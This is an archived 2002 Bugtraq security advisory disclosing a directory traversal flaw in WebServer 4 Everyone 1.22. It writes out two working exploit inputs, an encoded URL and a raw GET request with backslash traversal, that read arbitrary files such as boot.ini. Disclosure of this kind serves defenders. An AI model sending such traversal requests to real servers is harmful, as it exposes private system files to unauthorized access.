Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

advisory

From: "UkR security team™" <cuctema () ok ru>
Date: Thu, 05 Sep 2002 16:30:30 +0400
 -----------  UkR security team advisory  ------------
     WebServer 4 Everyone directory traversal bug
 -----------------------------------------------------

Name:      WebServer 4 Everyone directory traversal bug
Date:                                        28.08.2002
Author:   UkR-XblP/ UkR security team/ http://ust.dp.ua
Application: WebServer 4 Everyone Version: 1.22 URL: http://www.freeware.lt/ 
Risk: An attacker can view every file in the remote sys
About:   WebServer 4 Everyone is a commercial webserver
                            that runs on Win32 systems.
Bug:  problem is caused by the character '\' (%5c) that
is not checked as bad character, so the server follow the path in the URI that the attacker give 
      until it reach the file requested.
Exploits: http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini 
              or GET /\..\..\..\..\..\boot.ini HTTP/1.0
     This last is an HTTP request that can be sent with
telnet because some browsers can modify the "\.." chars.

Greetz:     2 Nadya Ostafiychuk - happy birthday !!! ;)
---
Professional hosting for everyone - http://www.host.ru
Previous By Date Next
Previous By Thread Next

Current thread: